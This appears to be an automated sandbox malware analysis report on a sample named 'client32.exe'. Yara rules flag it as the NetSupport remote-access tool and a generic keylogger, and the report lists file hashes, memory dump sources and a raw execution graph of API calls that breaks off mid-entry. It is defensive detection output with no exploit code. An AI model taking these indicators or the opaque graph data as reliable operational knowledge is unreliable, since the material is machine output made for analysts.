                                                                                                                                                                                                  Start time:13:05:56
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:121'304 bytes
                                                                                                                                                                                                  MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.70082150611.00000000027FC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000000.69135758155.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.70080906135.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.70082720696.0000000003250000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                  Start time:13:06:07
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:121'304 bytes
                                                                                                                                                                                                  MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000C.00000000.69246854158.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000C.00000002.69248279133.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000C.00000002.69250187547.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                  Start time:13:06:15
                                                                                                                                                                                                  Start date:31/10/2024
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:121'304 bytes
                                                                                                                                                                                                  MD5 hash:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000000.69327908302.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.69330790653.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000D.00000002.69329343216.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                    • Instruction ID: b02473a0b772b9bcc608bd38bfd279ef6e281a2390e9538117ec7047e2953247
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6e539afbd519a4846d4e9b2332d1000bec9b277c3f30597ffd71a78877eab9d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAB12871702205CFDB249F69E4507AABBE2BFC5225F14D0FAD6498F251DA30C981CB92
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69140593168.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_4f40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 0174a8180f857a34919426992e941ee660a72e79190d0cc5bbd8444e824c4e6a
                                                                                                                                                                                                    • Instruction ID: e20c710cad75ae015e754cb2b9b0df22eca72ee13a07ab83157ec212c78800af
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0174a8180f857a34919426992e941ee660a72e79190d0cc5bbd8444e824c4e6a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9691B374A002498FCB15CF58C4949AEFFB1FF88310B2585A9E955AB3A5C735FC52CB90
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69176471168.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7e40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 4ceb677f36a5371270bed37eaf7f2dd5775978002f0287c7a7313a185c403a66
                                                                                                                                                                                                    • Instruction ID: a83ac8dc9d5de3e880134ac7387ff647737cf837285e91f41559358ee600287e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ceb677f36a5371270bed37eaf7f2dd5775978002f0287c7a7313a185c403a66
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C713AF5B02242CFCB249F78E4047AA7BE1AF87259F14907AC505DF285EB35C991CBA1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69176471168.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7e40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: b54fb0139ab1954ff09ad32c16ad2ea1aefe0d2026dcb46067feb86dcdbbcbfc
                                                                                                                                                                                                    • Instruction ID: e161be96ba9fd2e5541d8f201f3f5968e39b2c596cd0c09c593018b279dd439c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b54fb0139ab1954ff09ad32c16ad2ea1aefe0d2026dcb46067feb86dcdbbcbfc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6410AF5702201CFDF249F64A4459AB7BB2AF82259F1680E6D504BF253C635E981CB61
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69140593168.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_4f40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: eb5cd65de5704d66564245602ae1b563e13b6a737f7d97c97803e6846adfcc83
                                                                                                                                                                                                    • Instruction ID: d8f1f286c75059a0c2e74e6783235d16957ab6faef9dad3399f111af58fb4e79
                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb5cd65de5704d66564245602ae1b563e13b6a737f7d97c97803e6846adfcc83
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64413D74A005098FCB15CF58C494AAEFBB1FF88314B2585A9E9159B365C732FD52CB90
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69176471168.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7e40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 86dbc1061cf765f7f8b8843dfdbc1eb0f7c59cbb95036474ce1e4114f9da546c
                                                                                                                                                                                                    • Instruction ID: ba5bdd3a54f2252af6100968d8e525d77a1841dbfa66ffa81e7a91aeed0816af
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 86dbc1061cf765f7f8b8843dfdbc1eb0f7c59cbb95036474ce1e4114f9da546c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC31A6B1602206DFCB24CF69E444BAAB7F2BB81329F19D0F5D6188B254D730D9C1DBA1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69176471168.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7e40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: d067eba5fcce0f2805fe20d7c565ca05f5f17ae20860898601fafd1545d81710
                                                                                                                                                                                                    • Instruction ID: 10827152cd95baa15430d68d93c395ea80dd9896ace9dfcc34ddf8364cb78f55
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d067eba5fcce0f2805fe20d7c565ca05f5f17ae20860898601fafd1545d81710
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13319EF2A02706CFDF248F19E944BA6B7F1BF47219F08E0A6E9058B251D371D990DB91
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69176471168.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_7e40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 5037976d74e0c6c6db85cd842400e55537c78ccb2c521e708cfc288b1ed3e137
                                                                                                                                                                                                    • Instruction ID: 54259f4356388e36f66753947ee1579cbd25838591900ec979680ba6be80029e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5037976d74e0c6c6db85cd842400e55537c78ccb2c521e708cfc288b1ed3e137
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C62104F5706282CFCF555F24A8003B57BA1AF8760AF1540AAC911DB1C8DB35CA81C7A2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69140593168.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_4f40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 1d0756efdcf513ce99f9e0f754af569eea1ab120f6e49ec9423f6f588ca69947
                                                                                                                                                                                                    • Instruction ID: 7ca16e46d0c98898d7490e1c37d2817e0d73d61ebfa4908e8c401d232f5b96ef
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d0756efdcf513ce99f9e0f754af569eea1ab120f6e49ec9423f6f588ca69947
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80215E74A042098FCB00DF98C4809AAFBB1FF89310B14809AD809EB352C730FD42CBA1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000008.00000002.69140593168.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_4f40000_powershell.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: c832f03a037aaa08e1dde566ff0cdd00821b059c21f82174a8364e240bd34d4a
                                                                                                                                                                                                    • Instruction ID: 006cfe8480a5347c19e455316f5425eb77f1051ce08809885e6acf9170a0d4c9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c832f03a037aaa08e1dde566ff0cdd00821b059c21f82174a8364e240bd34d4a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD212974A052498FCB04DF98C8809AAFBB1FF89310B158599E909EB352C731ED42CFA1
                                                                                                                                                                                                    Memory Dump Source

                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                    Execution Coverage:5%
                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                    Signature Coverage:6.8%
                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                    Total number of Limit Nodes:104
83661->83663 83771 11173428 LeaveCriticalSection 83663->83771 83664->83541 83665->83547 83666->83562 83667->83556 83668->83559 83669->83562 83670->83569 83671->83578 83672->83562 83673->83577 83674->83586 83675->83579 83676->83587 83677->83583 83678->83592 83759->83545 83760->83558 83761->83558 83762->83648 83763->83650 83764->83655 83766 11166597 83765->83766 83768 111665d4 83766->83768 83769 111665b5 Sleep 83766->83769 83772 1116c936 83766->83772 83768->83661 83768->83663 83770 111665ca 83769->83770 83770->83766 83770->83768 83771->83652 83773 1116c942 83772->83773 83778 1116c95d 83772->83778 83774 1116c94e 83773->83774 83773->83778 83781 11165abf 23 API calls 83774->83781 83775 1116c970 RtlAllocateHeap 83777 1116c997 83775->83777 83775->83778 83777->83766 83778->83775 83778->83777 83782 11169c78 DecodePointer 83778->83782 83779 1116c953 83779->83766 83781->83779 83782->83778 83803 11062342 83804 11062348 83803->83804 83805 11062425 83804->83805 83807 11062389 83804->83807 83815 1105d470 83804->83815 83821 1105d340 83807->83821 83809 110623bd 83810 110623dc 83809->83810 83812 1105d470 269 API calls 83809->83812 83811 1105d340 75 API calls 83810->83811 83813 1106240c 83811->83813 83812->83810 83813->83805 83814 1105d470 269 API calls 83813->83814 83814->83805 83816 1105d49a 83815->83816 83831 1105d430 83816->83831 83819 1115e4d1 5 API calls 83820 1105d4bb 83819->83820 83820->83807 83822 1105d36f 83821->83822 83823 1105d395 83822->83823 83824 1105d375 83822->83824 83826 1115e4d1 5 API calls 83823->83826 83825 1115fe1b 75 API calls 83824->83825 83827 1105d382 83825->83827 83828 1105d3a2 83826->83828 83829 1115e4d1 5 API calls 83827->83829 83828->83809 83830 1105d38f 83829->83830 83830->83809 83832 1105d43c 83831->83832 83836 110622a0 83832->83836 83839 1105f4e0 83832->83839 83833 1105d464 83833->83819 83883 11060b10 83836->83883 83840 1105f557 EnterCriticalSection 83839->83840 83841 1105f590 83840->83841 83913 11141660 83841->83913 83844 1110c4a0 261 API calls 83845 
1105f680 83844->83845 83916 1105e890 83845->83916 83848 1105f6dd 83849 1105f80a 83848->83849 83869 1105f6e7 83848->83869 83851 1105f827 83849->83851 83852 1105f810 83849->83852 83855 1105f86a 83851->83855 83931 1113f670 RegQueryValueExA 83851->83931 83930 110290f0 261 API calls 83852->83930 83859 1105f8af RegSetValueExA 83855->83859 83860 1105f87f 83855->83860 83857 1105f791 83858 1105f7ac LeaveCriticalSection 83857->83858 83861 1105f802 83858->83861 83862 1105f7d3 83858->83862 83859->83857 83866 1105f92a 83859->83866 83864 1105f899 RegDeleteValueA 83860->83864 83865 1105f88f 83860->83865 83873 1105f95e 83861->83873 83875 1105f992 83861->83875 83879 1105f97b 83861->83879 83924 11142a60 83862->83924 83864->83857 83865->83864 83933 110290f0 261 API calls 83866->83933 83868 1115e4d1 5 API calls 83872 1105f9ca 83868->83872 83869->83857 83923 1105f260 82 API calls 83869->83923 83872->83833 83876 11142a60 21 API calls 83873->83876 83873->83879 83878 11142a60 21 API calls 83875->83878 83875->83879 83876->83879 83877 1105f765 83880 1115f3b5 23 API calls 83877->83880 83881 1105f775 83877->83881 83878->83879 83879->83868 83880->83881 83881->83857 83882 1115f3b5 23 API calls 83881->83882 83882->83857 83884 11060b26 83883->83884 83893 11060b5b 83883->83893 83895 11080b10 83884->83895 83885 1105f4e0 269 API calls 83887 11060b83 83885->83887 83887->83833 83888 11060b2e 83889 11060b37 83888->83889 83890 11060b4e 83888->83890 83899 110290f0 261 API calls 83889->83899 83900 11080c50 83890->83900 83893->83885 83896 11080b1c 83895->83896 83898 11080b21 83895->83898 83910 11080a30 IsDBCSLeadByte 83896->83910 83898->83888 83901 11080c5d 83900->83901 83902 11080c62 83900->83902 83911 11080a30 IsDBCSLeadByte 83901->83911 83903 11080c6b 83902->83903 83904 11080c7f 83902->83904 83912 11160e4e 81 API calls 83903->83912 83907 11080ce3 83904->83907 83909 11161f66 81 API calls 83904->83909 83907->83893 83908 11080c78 83908->83893 83909->83904 83910->83898 83911->83902 83912->83908 83934 
1113ef50 83913->83934 83917 1105e8a7 83916->83917 83918 1105e8cc 83916->83918 83917->83918 83953 11160e4e 81 API calls 83917->83953 83919 1105e8e3 83918->83919 83954 11160e4e 81 API calls 83918->83954 83919->83848 83922 1105eef0 35 API calls 83919->83922 83922->83848 83923->83877 83925 11142a71 83924->83925 83926 11142a6c 83924->83926 83955 11141f60 83925->83955 83958 11141d10 18 API calls 83926->83958 83932 1113f69a 83931->83932 83932->83855 83935 1113ef60 83934->83935 83935->83935 83936 1110c4a0 261 API calls 83935->83936 83937 1113ef88 83936->83937 83940 1113ee60 83937->83940 83939 1105f661 83939->83844 83941 1113eeb2 83940->83941 83942 1113ee77 83940->83942 83951 1113ed90 MultiByteToWideChar 83941->83951 83943 1115e4d1 5 API calls 83942->83943 83945 1113eeae 83943->83945 83945->83939 83946 1113eee2 83952 1113edd0 WideCharToMultiByte GetLastError 83946->83952 83948 1113eef6 83949 1115e4d1 5 API calls 83948->83949 83950 1113ef09 83949->83950 83950->83939 83951->83946 83952->83948 83953->83917 83954->83919 83959 11141e10 83955->83959 83957 11141f72 83957->83861 83958->83925 83960 11141e34 83959->83960 83961 11141e39 83959->83961 83979 11141d10 18 API calls 83960->83979 83962 11141ea2 83961->83962 83963 11141e42 83961->83963 83965 11141f4e 83962->83965 83966 11141eaf wsprintfA 83962->83966 83967 11141e79 83963->83967 83969 11141e50 83963->83969 83970 1115e4d1 5 API calls 83965->83970 83968 11141ed2 83966->83968 83973 1115e4d1 5 API calls 83967->83973 83968->83968 83971 11141ed9 wvsprintfA 83968->83971 83975 1115e4d1 5 API calls 83969->83975 83972 11141f5a 83970->83972 83978 11141ef4 83971->83978 83972->83957 83974 11141e9e 83973->83974 83974->83957 83976 11141e75 83975->83976 83976->83957 83977 11141f41 OutputDebugStringA 83977->83965 83978->83977 83978->83978 83979->83961 83980 11030444 GetModuleHandleA GetProcAddress 83981 11030461 GetNativeSystemInfo 83980->83981 83983 1103046d 83980->83983 83981->83983 83982 1110c420 261 API calls 83985 11030414 83982->83985 
83984 1103040d 83983->83984 83987 110304d1 83983->83987 83984->83982 83996 11030430 GetStockObject GetObjectA 83984->83996 84048 11105d40 83985->84048 83989 1110c420 261 API calls 83987->83989 83988 11030696 SetErrorMode SetErrorMode 83993 1110c420 261 API calls 83988->83993 83992 110304d8 83989->83992 84178 110f8130 268 API calls 83992->84178 83994 110306d2 83993->83994 84091 11027fe0 83994->84091 83996->83988 83998 110306ec 83999 1110c420 261 API calls 83998->83999 84000 11030712 83999->84000 84001 11027fe0 264 API calls 84000->84001 84002 1103072b InterlockedExchange 84001->84002 84004 1110c420 261 API calls 84002->84004 84005 11030753 84004->84005 84094 11089840 84005->84094 84007 1103076b GetACP 84105 1115f8a3 84007->84105 84012 1103079c 84148 1113f220 84012->84148 84015 1110c420 261 API calls 84049 1110c420 261 API calls 84048->84049 84050 11105da1 84049->84050 84051 11105db9 OpenEventA 84050->84051 84194 111042a0 84050->84194 84054 11105ee1 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 84051->84054 84055 11105e28 CloseHandle GetSystemDirectoryA 84051->84055 84057 1110c420 261 API calls 84054->84057 84056 11105e48 84055->84056 84056->84056 84058 11105e50 LoadLibraryA 84056->84058 84059 11105f33 84057->84059 84058->84054 84060 11105e81 84058->84060 84061 11105f4c 84059->84061 84262 110f23a0 264 API calls 84059->84262 84229 11141710 84060->84229 84213 1110c2b0 84061->84213 84065 11105e8b 84067 11105e92 GetProcAddress 84065->84067 84068 11105eaa GetProcAddress 84065->84068 84067->84068 84070 11105ed4 FreeLibrary 84068->84070 84071 11105ec6 84068->84071 84070->84054 84071->84054 84073 11106015 84075 1115e4d1 5 API calls 84073->84075 84074 1110c420 261 API calls 84076 11105f83 84074->84076 84077 1110602f 84075->84077 84078 11105f94 84076->84078 84079 11105f9d 84076->84079 84077->83996 84263 110f23a0 264 API calls 84078->84263 84081 1110c2b0 420 API calls 84079->84081 84082 11105fb9 CloseHandle 84081->84082 84083 11141710 86 API 
calls 84082->84083 84084 11105fca 84083->84084 84084->84073 84085 1110c420 261 API calls 84084->84085 84086 11105fd8 84085->84086 84087 11105ff2 84086->84087 84264 110f23a0 264 API calls 84086->84264 84089 1110c2b0 420 API calls 84087->84089 84090 1110600e CloseHandle 84089->84090 84090->84073 84092 110879a0 264 API calls 84091->84092 84093 11027feb 84092->84093 84093->83998 84095 1110c420 261 API calls 84094->84095 84096 11089877 84095->84096 84097 11089899 InitializeCriticalSection 84096->84097 84098 1110c420 261 API calls 84096->84098 84101 110898fa 84097->84101 84100 11089892 84098->84100 84100->84097 84711 1115e96a 34 API calls 84100->84711 84101->84007 84103 110898c9 84712 1115edc1 RaiseException 84103->84712 84106 1115f8d6 84105->84106 84107 1115f8c1 84105->84107 84106->84107 84109 1115f8dd 84106->84109 84713 11165abf 23 API calls 84107->84713 84715 1116bbed 96 API calls 84109->84715 84110 1115f8c6 84714 1116a6d4 11 API calls 84110->84714 84113 1115f903 84114 11030792 84113->84114 84716 1116b9f4 93 API calls 84113->84716 84116 11161c63 84114->84116 84117 11161c6f 84116->84117 84118 11161c90 84117->84118 84119 11161c79 84117->84119 84120 11167f85 62 API calls 84118->84120 84742 11165abf 23 API calls 84119->84742 84122 11161c95 84120->84122 84124 1116cc78 70 API calls 84122->84124 84123 11161c7e 84743 1116a6d4 11 API calls 84123->84743 84126 11161c9f 84124->84126 84127 1116658e 23 API calls 84126->84127 84129 11161cb5 84127->84129 84128 11161c89 84128->84012 84129->84128 84717 111610d4 84129->84717 84878 1113f130 84148->84878 84150 1113f235 84151 110307c8 84150->84151 84152 1113f130 IsDBCSLeadByte 84150->84152 84153 11161f66 81 API calls 84150->84153 84151->84015 84152->84150 84153->84150 84178->83996 84265 1110c520 84194->84265 84197 1110c520 3 API calls 84198 111042ec 84197->84198 84199 1110c520 3 API calls 84198->84199 84200 111042fe 84199->84200 84201 1110c520 3 API calls 84200->84201 84202 1110430f 84201->84202 84203 1110c520 3 API calls 84202->84203 
84204 11104320 84203->84204 84205 1110c420 261 API calls 84204->84205 84206 11104331 84205->84206 84207 1110441a 84206->84207 84208 1110433c LoadLibraryA LoadLibraryA 84206->84208 84272 1115e96a 34 API calls 84207->84272 84208->84051 84210 11104429 84273 1115edc1 RaiseException 84210->84273 84212 1110443e 84214 1110c2d0 CreateThread 84213->84214 84215 1110c2bf CreateEventA 84213->84215 84217 1110c2f6 84214->84217 84218 1110c30d 84214->84218 84277 1110cd70 84214->84277 84291 11026ee0 84214->84291 84316 1102c030 84214->84316 84351 110ffe60 84214->84351 84215->84214 84276 110290f0 261 API calls 84217->84276 84220 1110c311 WaitForSingleObject CloseHandle 84218->84220 84221 11105f68 CloseHandle 84218->84221 84220->84221 84223 1109dcf0 84221->84223 84224 1109dcff GetCurrentProcess OpenProcessToken 84223->84224 84225 1109dd3d 84223->84225 84224->84225 84226 1109dd22 84224->84226 84225->84073 84225->84074 84680 1109dc20 84226->84680 84228 1109dd2b CloseHandle 84228->84225 84230 11141731 GetVersionExA 84229->84230 84239 1114190c 84229->84239 84232 11141753 84230->84232 84230->84239 84231 11141915 84234 1115e4d1 5 API calls 84231->84234 84233 11141760 RegOpenKeyExA 84232->84233 84232->84239 84235 1114178d 84233->84235 84233->84239 84236 11141922 84234->84236 84241 1113f670 RegQueryValueExA 84235->84241 84236->84065 84237 11141974 84238 1115e4d1 5 API calls 84237->84238 84240 11141984 84238->84240 84239->84231 84239->84237 84698 11080d00 84239->84698 84240->84065 84242 111417cf 84241->84242 84244 1113f670 RegQueryValueExA 84242->84244 84246 111417f9 84244->84246 84245 1114195c 84245->84231 84248 1115f5b7 75 API calls 84245->84248 84247 111418ff RegCloseKey 84246->84247 84249 1115f5b7 75 API calls 84246->84249 84247->84239 84250 1114196d 84248->84250 84251 1114180e 84249->84251 84250->84231 84250->84237 84693 111601fd 84251->84693 84253 1114181d 84254 11141836 84253->84254 84255 111601fd 75 API calls 84253->84255 84256 1115f5b7 75 API calls 84254->84256 84255->84253 84257 
